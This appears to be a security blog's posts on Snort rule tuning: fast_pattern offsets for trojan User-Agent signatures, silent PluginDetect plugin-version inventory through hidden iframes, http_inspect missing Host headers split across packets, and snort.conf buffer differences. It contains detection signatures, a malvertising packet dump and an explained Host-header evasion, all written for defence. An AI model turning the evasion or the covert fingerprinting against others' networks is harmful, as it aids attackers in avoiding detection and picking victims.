We started doing some Snort signature performance profiling and were somewhat shocked at how many signatures were using nearly the exact same amount of processor time, and quite a bit more of it than they should have. Below are a few (there are several more) sigs from the Emerging Threats rule set that were demonstrating this behavior:
SID      Checks   Proc
2009810  138182   156828
2009805  138182   153896
So it is somewhat interesting that these rules are all being checked exactly the same number of times and are using so much more processor than other signatures. What do they have in common? Let's take a look at 2009805 and 2009810 and see:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent|3a| Mozilla/4.0 (SPGK)|0d 0a|"; nocase; http_header; reference:url,home.mcafee.com/VirusInfo/VirusProfile.aspx?key=212955#none; reference:url,www.threatexpert.com/threats/virus-win32-luder-b.html; reference:url,doc.emergingthreats.net/2009805; classtype:trojan-activity; sid:2009805; rev:4;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| na|3b| .NET CLR 2.0.50727|3b| .NET CLR 3.0.4506.2152|3b| .NET CLR 3.5.30729)|0d0a|"; http_header; reference:url,www.cyber-ta.org/releases/malware-analysis/public/2009-07-12-public/ARCHIVE/1247423556.chatter; reference:url,doc.emergingthreats.net/2009810; classtype:trojan-activity; sid:2009810; rev:5;)
So if we look at the content matches, we have this in common:
content:"User-Agent|3a| Mozilla/4.0 (SPGK)|0d 0a|";
content:"User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| na|3b| .NET CLR 2.0.50727|3b| .NET CLR 3.0.4506.2152|3b| .NET CLR 3.5.30729)|0d0a|";
Remember that the VRT snort.conf sets a max-pattern-len of 20 bytes for the fast pattern matcher. The line below is from the snort.conf that comes from VRT:
---SNIP---
config detection: search-method ac-split search-optimize max-pattern-len 20
---SNIP---
Snort hands the fast pattern matcher the longest content in each rule (the "GET" match is shorter), truncated to those 20 bytes, and only evaluates the rest of that content and the other rule options after the prefix hits. Count the bytes (|3a| is a single byte) and both rules collapse to the same 20-byte prefix, which appears in nearly every HTTP request crossing the sensor, so every request sends both rules through full evaluation:
User-Agent: Mozilla/
User-Agent: Mozilla/
So we can use the fast_pattern modifier's offset and length arguments to choose which portion of the content match goes to the fast pattern matcher, and point it at what is truly unique about the strings we are searching for:
Usage: fast_pattern:<offset>,<length>;
Offset and length are counted in bytes of the decoded content (after |xx| escapes have become single bytes), starting from zero. The examples below make the fast pattern matcher look for "(SPGK)" plus the trailing CRLF (bytes 24 through 31 of the first content) and "MSIE 7.0; na;" (bytes 37 through 49 of the second), the strings that were highlighted in green in the original post:
content:"User-Agent: Mozilla/4.0 (SPGK)|0d 0a|"; fast_pattern:24,8;
content:"User-Agent: Mozilla/4.0 (compatible\; MSIE 7.0\; na\; .NET CLR 2.0.50727\; .NET CLR 3.0.4506.2152\; .NET CLR 3.5.30729)|0D 0A|"; fast_pattern:37,13;
Updated signatures:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET"; flow:established,to_server; content:"GET"; http_method; content:"User-Agent: Mozilla/4.0 (SPGK)|0d 0a|"; fast_pattern:24,8; http_header; reference:url,home.mcafee.com/VirusInfo/VirusProfile.aspx?key=212955#none; reference:url,www.threatexpert.com/threats/virus-win32-luder-b.html; reference:url,doc.emergingthreats.net/2009805; classtype:trojan-activity; sid:2009805; rev:5;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent: Mozilla/4.0 (compatible\; MSIE 7.0\; na\; .NET CLR 2.0.50727\; .NET CLR 3.0.4506.2152\; .NET CLR 3.5.30729)|0D 0A|"; fast_pattern:37,13; http_header; reference:url,www.cyber-ta.org/releases/malware-analysis/public/2009-07-12-public/ARCHIVE/1247423556.chatter; reference:url,doc.emergingthreats.net/2009810; classtype:trojan-activity; sid:2009810; rev:6;)
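To check offsets like 24,8 and 37,13 without counting by hand, here is an added Python helper (not part of the original post or of Snort) that decodes a Snort content string into the bytes the matcher sees, shows what the fast pattern matcher would key on under max-pattern-len 20, and computes the fast_pattern offset and length for a chosen unique substring. The two content strings are copied from the rules above; the rest is helper code with no external dependencies.

```python
# Content strings copied from the two Emerging Threats rules discussed above.
LUDER_CONTENT = "User-Agent|3a| Mozilla/4.0 (SPGK)|0d 0a|"
SWIZZOR_CONTENT = ("User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| na|3b| .NET CLR 2.0.50727|3b| "
                   ".NET CLR 3.0.4506.2152|3b| .NET CLR 3.5.30729)|0d0a|")


def parse_content(content: str) -> bytes:
    """Decode a Snort content string into the bytes the matcher actually searches for:
    |..| runs are hex bytes, and a backslash escapes the following character (; " \\ |)."""
    out = bytearray()
    i = 0
    while i < len(content):
        c = content[i]
        if c == "|":
            end = content.index("|", i + 1)
            out += bytes.fromhex(content[i + 1:end])   # whitespace between hex bytes is allowed
            i = end + 1
        elif c == "\\" and i + 1 < len(content):
            out.append(ord(content[i + 1]))
            i += 2
        else:
            out.append(ord(c))
            i += 1
    return bytes(out)


def default_fast_pattern(content: str, max_pattern_len: int = 20) -> bytes:
    """What the fast pattern matcher keys on when fast_pattern is not given: the leading
    max-pattern-len bytes of the (longest) content, 20 with the VRT snort.conf setting."""
    return parse_content(content)[:max_pattern_len]


def fast_pattern_for(content: str, unique_part: str) -> tuple:
    """Offset and length, in decoded bytes, for fast_pattern:<offset>,<length> so that the
    matcher keys on unique_part instead of the shared prefix."""
    data, needle = parse_content(content), parse_content(unique_part)
    offset = data.find(needle)
    if offset < 0:
        raise ValueError("unique_part is not a substring of the decoded content")
    return offset, len(needle)


def fast_pattern_option(content: str, unique_part: str) -> str:
    """Render the rule option text to paste after the content match."""
    offset, length = fast_pattern_for(content, unique_part)
    return f"fast_pattern:{offset},{length};"


def shared_prefixes(contents, max_pattern_len: int = 20) -> dict:
    """Group contents by the default fast pattern they collapse to; every group with more
    than one member is a set of rules that all get fully evaluated on the same packets."""
    groups = {}
    for content in contents:
        groups.setdefault(default_fast_pattern(content, max_pattern_len), []).append(content)
    return {prefix: members for prefix, members in groups.items() if len(members) > 1}


if __name__ == "__main__":
    for name, content, unique in (("2009805", LUDER_CONTENT, "(SPGK)|0d 0a|"),
                                  ("2009810", SWIZZOR_CONTENT, "MSIE 7.0|3b| na|3b|")):
        print(name, default_fast_pattern(content), fast_pattern_option(content, unique))
```

Run the helper against every rule in a file and any prefix that comes back from shared_prefixes with several members is a candidate for the same treatment.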
In attempting to identify how vulnerable our client's environment is to drive-by kits, we set about enumerating the versions of Java, Acrobat and Flash tied into the browser specifically. We found a great collection of JavaScript called PluginDetect that has good options for code generation and really good documentation on how to use it. For our setup we used the PluginDetect Script Generator and selected the following options under section 1:
- Java (we unchecked the “Enable NOTF” option that is selected by default)
- Flash
- Adobe PDF Reader
We left sections 2-5 at the default settings and generated the script. Then we put the script and jar file on a web server we control that most people hit throughout the day, and modified its default home page. Good candidates in your environment might be the block page for your web filter, an internal portal, or anything else that gets lots of web traffic from your client network. First we put the generated PluginDetect.js file and the getJavaInfo.jar file (pulled from the Java detection documentation page for PluginDetect) into a js/ subdirectory. Then we modified the index page to contain the relevant portions of the example page shown below. You can get rid of the second document.write in each block, where the versions are written out as HTML, when you actually deploy; we only do that for demonstration:
<html>
<head>
<script type="text/javascript" src="js/PluginDetect.js"></script>
<script>
// Use "." as the separator in the version strings that getVersion() returns.
PluginDetect.getVersion(".");
// isMinVersion() is non-negative when the plugin is installed and its version can be
// determined, and negative otherwise, so ">= 0" means "installed" for all three checks.
var installedAcrobat = PluginDetect.isMinVersion("AdobeReader");
var AdobeReader = installedAcrobat >= 0;
var installedJava = PluginDetect.isMinVersion('Java', '0', 'js/getJavaInfo.jar');
var Java = installedJava >= 0;
var installedFlash = PluginDetect.isMinVersion("Flash");
var Flash = installedFlash >= 0;
// Each detected plugin is reported to the web server as a zero-size iframe request whose
// query string carries the version, so the version ends up in the server's access log.
if (AdobeReader){
var versionAcrobat = PluginDetect.getVersion('AdobeReader');
document.write('<iframe src="acrobat.html?version=' + encodeURIComponent(versionAcrobat) + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Acrobat Version: ' + versionAcrobat +'<br>');
}
if (Java){
var versionJava = PluginDetect.getVersion('Java', 'js/getJavaInfo.jar');
document.write('<iframe src="java.html?version=' + encodeURIComponent(versionJava) + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Java Version: ' + versionJava +'<br>');
}
if (Flash){
var versionFlash = PluginDetect.getVersion('Flash');
document.write('<iframe src="flash.html?version=' + encodeURIComponent(versionFlash) + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Flash Version: ' + versionFlash +'<br>');
}
</script>
</head>
<body>
</body>
</html>
We also created empty acrobat.html, java.html and flash.html files in the same directory as index.html. This just cleans up the web server logs so you do not get lots of 404s. We have a live running example here: http://trojanedbinaries.com/PluginDetect/. Once this is running you can grep through your web server logs, normalize them by source IP and extract everything you want with basic Unix tools like grep, awk and sort.
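Here is an added example (not from the original post or from PluginDetect) of the log side of this setup, in Python: it parses Apache combined-format access log lines for the java.html, flash.html and acrobat.html iframe hits, keeps the last version reported per source IP and plugin, and lists the hosts that fall below a baseline. The log lines are constructed (documentation-range IPs, made-up versions), the versions use the "." separator set by the getVersion(".") call above, and the MINIMUM baseline is an assumption you would replace with the patch levels you actually require.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (documentation IPs, made-up versions) showing
# the zero-size iframe requests the detection page generates, plus one unrelated 404.
LOG_LINES = """\
10.1.2.3 - - [14/Sep/2010:09:01:12 -0500] "GET /PluginDetect/java.html?version=1.6.0.20 HTTP/1.1" 200 0 "http://intranet/" "Mozilla/4.0 (compatible; MSIE 7.0)"
10.1.2.3 - - [14/Sep/2010:09:01:12 -0500] "GET /PluginDetect/flash.html?version=10.1.82.76 HTTP/1.1" 200 0 "http://intranet/" "Mozilla/4.0 (compatible; MSIE 7.0)"
10.1.2.3 - - [14/Sep/2010:09:01:12 -0500] "GET /PluginDetect/acrobat.html?version=9.3.4 HTTP/1.1" 200 0 "-" "-"
10.1.2.3 - - [14/Sep/2010:09:01:13 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "-"
10.1.2.9 - - [14/Sep/2010:09:05:40 -0500] "GET /PluginDetect/java.html?version=1.5.0.11 HTTP/1.1" 200 0 "-" "-"
10.1.2.9 - - [14/Sep/2010:09:05:41 -0500] "GET /PluginDetect/flash.html?version=9.0.45.0 HTTP/1.1" 200 0 "-" "-"
10.1.2.9 - - [14/Sep/2010:11:20:02 -0500] "GET /PluginDetect/java.html?version=1.6.0.21 HTTP/1.1" 200 0 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PAGES = {"java.html": "Java", "flash.html": "Flash", "acrobat.html": "AdobeReader"}

# Assumed baseline (not from the post): replace with the patch levels you actually require.
MINIMUM = {"Java": "1.6.0.21", "Flash": "10.1.82.76", "AdobeReader": "9.3.4"}


def parse_line(line: str):
    """Return (ip, plugin, version) for one of the iframe hits, or None for any other line."""
    m = LINE_RE.match(line)
    if not m or m.group("status") != "200":
        return None
    parts = urlsplit(m.group("path"))
    plugin = PAGES.get(parts.path.rsplit("/", 1)[-1])
    version = parse_qs(parts.query).get("version", [""])[0]
    if not plugin or not version:
        return None
    return m.group("ip"), plugin, version


def version_tuple(version: str) -> tuple:
    """'1.6.0_20' or '10,1,82,76' -> (1, 6, 0, 20) / (10, 1, 82, 76), so versions compare numerically."""
    return tuple(int(part) for part in re.split(r"[.,_]", version) if part.isdigit())


def inventory(log_text: str) -> dict:
    """Last-seen version per source IP and plugin; a later hit overwrites an earlier one."""
    inv = defaultdict(dict)
    for line in log_text.splitlines():
        record = parse_line(line)
        if record:
            ip, plugin, version = record
            inv[ip][plugin] = version
    return dict(inv)


def outdated(inv: dict, minimum: dict = MINIMUM) -> list:
    """Sorted (ip, plugin, version) triples that are below the baseline for that plugin."""
    return sorted((ip, plugin, version)
                  for ip, plugins in inv.items()
                  for plugin, version in plugins.items()
                  if plugin in minimum and version_tuple(version) < version_tuple(minimum[plugin]))


if __name__ == "__main__":
    for ip, plugin, version in outdated(inventory(LOG_LINES)):
        print(f"{ip}\t{plugin}\t{version}")
```

Point the script at your real access log instead of LOG_LINES and it replaces the grep/awk/sort pass; keeping the last hit per IP matters because a machine that gets patched during the day otherwise keeps showing its morning version.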
We have been using the buffers provided by the http_inspect preprocessor for a while to write our signatures, but noticed a few times that they would not fire on HTTP requests from clients. After a little investigating we found that the signatures do not fire when an HTTP request is split across two packets, generally because of an extremely long URI combined with IE's insanely long list of "Accept:" headers. Snort's http_inspect preprocessor does not get the content from both packets into its buffers, which leads to false negatives. Since the URI is very long and IE puts the "Host:" header near the end of the request, it becomes easy to circumvent detection that is based on the HTTP Host header against IE browsers, unless you use jumbo frames, which is not feasible for most routing equipment, especially at gateways with substantial amounts of bandwidth. Below is an example signature we run to detect malvertising servers attempting to pass themselves off as legitimate advertising servers owned by Microsoft (which owns atdmt.com):
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"EID MALVERTISING request to view.atdmt.com.* host"; flow:established,to_server; content:"Host: view.atdmt.com."; http_header; content:!".302br.net"; distance:10; depth:10; classtype:bad-unknown; sid:5600118; rev:1;)
So we are just looking for requests to view.atdmt.com.* hosts, excluding .302br.net, since those are the globally distributed advertising servers actually owned by Microsoft. Below is the request to a malicious malvertising server that redirected a client to a drive-by site. In the original post the non-payload portions of the packet are blanked out with grey X's, the bytes of the TCP stream that made it into the http_header buffer are shown in green, the bytes that did not are shown in black, and the content we search for is highlighted in red; only the X's survive in this text version, so note that the Host header does not arrive until the second packet:
0000 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0010 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0020 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0030 XX XX XX XX XX XX 47 45 54 20 2f 4d 4f 4e 2f 69 XXXXXXGET /MON/i
0040 76 69 65 77 2f 64 6c 6e 6b 6b 6d 67 72 31 32 34 view/dlnkkmgr124
0050 35 33 36 31 33 31 6d 6f 6e 2f 64 69 72 65 63 74 536131mon/direct
0060 2f 30 31 2f 3f 74 69 6d 65 3d 30 2e 35 38 33 32 /01/?time=0.5832
0070 37 33 31 31 34 32 33 30 34 30 37 35 26 72 6e 3d 731142304075&rn=
0080 31 36 35 31 39 37 31 35 26 63 6c 69 63 6b 3d 68 16519715&click=h
0090 74 74 70 3a 2f 2f 75 73 2e 61 72 64 2e 79 61 68 ttp://us.ard.yah
00a0 6f 6f 2e 63 6f 6d 2f 53 49 47 3d 31 35 6f 6a 36 oo.com/SIG=15oj6
00b0 6a 72 37 71 2f 4d 3d 37 38 31 32 30 35 2e 31 34 jr7q/M=781205.14
00c0 33 32 32 32 39 36 2e 31 34 32 31 37 32 33 32 2e 322296.14217232.
00d0 32 38 38 35 33 39 2f 44 3d 6d 61 69 6c 5f 61 74 288539/D=mail_at
00e0 74 2f 53 3d 33 39 38 33 30 33 30 31 32 3a 4e 2f t/S=398303012:N/
00f0 5f 79 6c 74 3d 41 6f 58 79 4a 67 30 57 35 36 2e _ylt=AoXyJg0W56.
0100 77 45 39 4f 67 5f 50 54 58 50 64 30 6b 6e 37 30 wE9Og_PTXPd0kn70
0110 58 2f 59 3d 59 41 48 4f 4f 2f 45 58 50 3d 31 32 X/Y=YAHOO/EXP=12
0120 38 34 36 37 36 32 30 38 2f 4c 3d 2e 7a 69 35 4c 84676208/L=.zi5L
0130 55 6f 47 63 34 76 61 32 42 6e 6e 54 43 6f 34 4b UoGc4va2BnnTCo4K
0140 51 50 37 70 4a 38 38 41 6b 79 53 66 6c 41 41 43 QP7pJ88AkySflAAC
0150 42 51 76 2f 42 3d 53 6b 4f 58 4f 4e 6a 38 65 6c BQv/B=SkOXONj8el
0160 6f 2d 2f 4a 3d 31 32 38 34 36 36 39 30 30 38 35 o-/J=12846690085
0170 36 32 30 34 39 2f 4b 3d 43 52 61 34 33 31 41 5f 62049/K=CRa431A_
0180 77 56 75 62 43 75 57 5f 4e 62 67 79 6c 41 2f 41 wVubCuW_NbgylA/A
0190 3d 36 32 30 37 30 38 33 2f 52 3d 30 2f 2a 20 48 =6207083/R=0/* H
01a0 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a TTP/1.1..Accept:
01b0 20 69 6d 61 67 65 2f 67 69 66 2c 20 69 6d 61 67 image/gif, imag
01c0 65 2f 78 2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 e/x-xbitmap, ima
01d0 67 65 2f 6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 ge/jpeg, image/p
01e0 6a 70 65 67 2c 20 61 70 70 6c 69 63 61 74 69 6f jpeg, applicatio
01f0 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c n/x-shockwave-fl
0200 61 73 68 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e ash, application
0210 2f 78 61 6d 6c 2b 78 6d 6c 2c 20 61 70 70 6c 69 /xaml+xml, appli
0220 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 78 70 cation/vnd.ms-xp
0230 73 64 6f 63 75 6d 65 6e 74 2c 20 61 70 70 6c 69 sdocument, appli
0240 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 78 62 cation/x-ms-xb
Now here is the second packet in the request:
0000 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0010 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0020 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0030 XX XX XX XX XX XX 61 70 2c 20 61 70 70 6c 69 63 XXXXXXap, applic
0040 61 74 69 6f 6e 2f 78 2d 6d 73 2d 61 70 70 6c 69 ation/x-ms-appli
0050 63 61 74 69 6f 6e 2c 20 61 70 70 6c 69 63 61 74 cation, applicat
0060 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65 78 63 65 6c ion/vnd.ms-excel
0070 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e , application/vn
0080 64 2e 6d 73 2d 70 6f 77 65 72 70 6f 69 6e 74 2c d.ms-powerpoint,
0090 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6d 73 77 application/msw
00a0 6f 72 64 2c 20 2a 2f 2a 0d 0a 52 65 66 65 72 65 ord, */*..Refere
00b0 72 3a 20 68 74 74 70 3a 2f 2f 75 73 2e 6d 63 38 r: http://us.mc8
00c0 30 34 2e 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 04.mail.yahoo.co
00d0 6d 2f 6d 63 2f 6d 64 2e 70 68 70 3f 65 6e 3d 43 m/mc/md.php?en=C
00e0 50 31 32 35 32 26 76 3d 31 0d 0a 41 63 63 65 70 P1252&v=1..Accep
00f0 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 t-Language: en-u
0100 73 0d 0a 55 41 2d 43 50 55 3a 20 78 38 36 0d 0a s..UA-CPU: x86..
0110 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a Accept-Encoding:
0120 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d 0a gzip, deflate..
0130 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0140 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 lla/4.0 (compati
0150 62 6c 65 3b 20 4d 53 49 45 20 37 2e 30 3b 20 57 ble; MSIE 7.0; W
0160 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 47 indows NT 5.1; G
0170 54 42 36 3b 20 2e 4e 45 54 20 43 4c 52 20 32 2e TB6; .NET CLR 2.
0180 30 2e 35 30 37 32 37 3b 20 2e 4e 45 54 20 43 4c 0.50727; .NET CL
0190 52 20 31 2e 31 2e 34 33 32 32 3b 20 2e 4e 45 54 R 1.1.4322; .NET
01a0 20 43 4c 52 20 33 2e 30 2e 30 34 35 30 36 2e 33 CLR 3.0.04506.3
01b0 30 3b 20 2e 4e 45 54 20 43 4c 52 20 33 2e 30 2e 0; .NET CLR 3.0.
01c0 30 34 35 30 36 2e 36 34 38 3b 20 2e 4e 45 54 20 04506.648; .NET
01d0 43 4c 52 20 33 2e 30 2e 34 35 30 36 2e 32 31 35 CLR 3.0.4506.215
01e0 32 3b 20 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 2; .NET CLR 3.5.
01f0 33 30 37 32 39 29 0d 0a 48 6f 73 74 3a 20 76 69 30729)..Host: vi
0200 65 77 2e 61 74 64 6d 74 2e 63 6f 6d 2e 67 6f 6b ew.atdmt.com.gok
0210 72 65 61 6c 2e 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 real.com..Connec
0220 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 tion: Keep-Alive
0230 0d 0a 0d 0a ....
So it appears that, in this version, the http_inspect preprocessor fills its buffers (http_header, or any other buffer it creates for content matching) from one packet at a time and cannot reassemble bytes that are split across multiple packets. This is nothing new in the IDS world, since most detection happens at the frame/packet level (flowbits being the usual way to tie packets together), but for detection in general, and for inline Snort IPS deployments in particular, it would be extremely helpful for http_inspect to work on the reassembled request. Later Snort 2.9.x releases added Protocol Aware Flushing so that stream reassembly flushes client data to http_inspect at HTTP message boundaries rather than at fixed points; on a sensor of this vintage the practical check is to replay a two-packet request like the one above and confirm that your own Host-based rules really fire. Once reassembled, the client request looks like the following and would be very easy to write signatures against:
GET /MON/iview/dlnkkmgr124536131mon/direct/01/?time=0.5832731142304075&rn=16519715&click=http://us.ard.yahoo.com/SIG=15oj6jr7q/M=781205.14322296.14217232.288539/D=mail_att/S=398303012:N/_ylt=AoXyJg0W56.wE9Og_PTXPd0kn70X/Y=YAHOO/EXP=1284676208/L=.zi5LUoGc4va2BnnTCo4KQP7pJ88AkySflAACBQv/B=SkOXONj8elo-/J=1284669008562049/K=CRa431A_wVubCuW_NbgylA/A=6207083/R=0/* HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc804.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: view.atdmt.com.gokreal.com
Connection: Keep-Alive
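To make the failure mode concrete, here is an added example in Python (not from the original post or from Snort): it feeds the two segments above, abbreviated and embedded as constructed sample data, first to a per-packet check that mirrors what http_inspect was observed to do, and then through a small per-flow reassembler that waits for the end of the header block before evaluating the intent of SID 5600118 (Host starts with view.atdmt.com. and is not under .302br.net). The flow tuple and the legitimate-host request are made up.

```python
import re

# Constructed TCP segment payloads, abbreviated from the two-packet IE request dumped above.
SEGMENT_1 = (
    b"GET /MON/iview/dlnkkmgr124536131mon/direct/01/?time=0.5832731142304075&rn=16519715"
    b"&click=http://us.ard.yahoo.com/SIG=15oj6jr7q/M=781205.14322296/A=6207083/R=0/* HTTP/1.1\r\n"
    b"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, "
    b"application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xb")
SEGMENT_2 = (
    b"ap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, "
    b"application/msword, */*\r\n"
    b"Referer: http://us.mc804.mail.yahoo.com/mc/md.php?en=CP1252&v=1\r\n"
    b"Accept-Language: en-us\r\nUA-CPU: x86\r\nAccept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727)\r\n"
    b"Host: view.atdmt.com.gokreal.com\r\nConnection: Keep-Alive\r\n\r\n")
# Constructed request to one of Microsoft's own servers; this must not alert.
LEGIT_REQUEST = b"GET /b/s HTTP/1.1\r\nHost: view.atdmt.com.example.302br.net\r\n\r\n"
FLOW = ("10.0.0.5", 1234, "203.0.113.7", 80)   # made-up 4-tuple used as the reassembler key


def header_block(data: bytes):
    """Return the request line plus headers if data starts with a request line and the
    header block is complete (terminated by an empty line); otherwise None."""
    if not re.match(rb"[A-Z]+ \S+ HTTP/1\.[01]\r\n", data):
        return None
    head, terminator, _ = data.partition(b"\r\n\r\n")
    return head if terminator else None


def host_header(headers: bytes):
    m = re.search(rb"^Host:[ \t]*([^\r\n]+)", headers, re.MULTILINE | re.IGNORECASE)
    return m.group(1).strip() if m else None


def rule_matches(headers: bytes) -> bool:
    """Intent of SID 5600118: Host is view.atdmt.com.<something> but not under .302br.net."""
    host = host_header(headers)
    if host is None:
        return False
    host = host.lower()
    return host.startswith(b"view.atdmt.com.") and not host.endswith(b".302br.net")


def inspect_per_packet(segments) -> bool:
    """Evaluate every segment on its own, as http_inspect was observed to do: the Host header
    only exists in the second segment, which has no request line in front of it."""
    return any(rule_matches(header_block(seg) or b"") for seg in segments)


class RequestReassembler:
    """Accumulate client-side payload per flow until a complete header block has arrived."""

    def __init__(self):
        self.pending = {}

    def feed(self, flow, payload: bytes):
        data = self.pending.get(flow, b"") + payload
        head = header_block(data)
        if head is None:
            self.pending[flow] = data
            return None
        self.pending.pop(flow, None)
        return head


def inspect_reassembled(segments, flow=FLOW) -> bool:
    """Evaluate the rule only once the whole header block has been put back together."""
    reassembler = RequestReassembler()
    return any(rule_matches(reassembler.feed(flow, seg) or b"") for seg in segments)


if __name__ == "__main__":
    print("per packet:", inspect_per_packet([SEGMENT_1, SEGMENT_2]))
    print("reassembled:", inspect_reassembled([SEGMENT_1, SEGMENT_2]))
```

The per-packet pass never sees a request line and a Host header in the same buffer, so it stays silent; the reassembled pass alerts, and the .302br.net request is still ignored.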
For some time there has been a discrepancy between the snort.conf file distributed with the source code and the snort.conf file distributed by Sourcefire's VRT group in their rule downloads. We discovered that this has a pretty serious effect on users of the two versions of the configuration file, and on how rules must be written depending on which configuration you have. In this post we focus on the http_inspect preprocessor configuration differences and the effect they are already having on your current Snort deployment. Pictured below is the http_inspect portion of the snort.conf distributed with Snort versions <= 2.8.6.1 (left) and the portion distributed with the VRT ruleset and Snort versions >= 2.9.0-RC (right). Differences are highlighted in red:
[Image: http_inspect stanza from the source snort.conf (left) and the VRT snort.conf (right), differences highlighted in red]
One of the biggest differences is that the source version does not contain the "inspect_gzip" option. So even if you take the time to compile Snort with --enable-zlib, the http_inspect preprocessor is not going to gunzip compressed HTTP responses for inspection, and all of your signatures looking for content in HTTP response bodies from servers using mod_gzip (or any other gzip Content-Encoding) will never fire if you are using the http_inspect configuration distributed with the Snort source code (which we would guess applies to most snort.conf files shipped in Linux distros).
You may also notice the "enable_cookie" option in the VRT version of the snort.conf. This also has a big effect on signature writing. Let us look at the following signature we wrote to help us track SEO exploit kits:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET DRIVEBY SEO kit ecountered - bmb cookie"; flow:established,to_client; content:"bmb=12"; http_cookie; classtype:bad-unknown; sid:5600064; rev:2;)
So in this signature we are looking for the response from an external server to have the string "bmb=12" in the cookie field. It was written based on packets we were seeing like the following:
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: bmb=1279227526; expires=<REMOVED>; path=/; domain=ssladdon.in
Content-Length: 10507
Content-Disposition: inline; filename=index.html
<html><body>this is the body</body></html>
When Snort processes the above packet, http_inspect splits the HTTP header into several buffers for the rules to examine. One of those buffers is searched by putting http_cookie after a content:"foo" match, which limits that search to the http_cookie buffer, a buffer that is only filled when a cookie is found in the header. So the above signature will only fire against the above packet if you use the VRT (right) version of the http_inspect configuration; with the source (left) version it does not fire. What is also unfortunate is that with the VRT (right) version, a rule that does not name the buffer it wants (http_cookie, for example) never sees the contents of that buffer, because a buffer is only checked when a rule specifies it. So if you run the VRT (right) version with the below signature, it will not fire either:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET DRIVEBY SEO kit ecountered - bmb cookie"; flow:established,to_client; content:"bmb=12"; classtype:bad-unknown; sid:5600064; rev:2;)
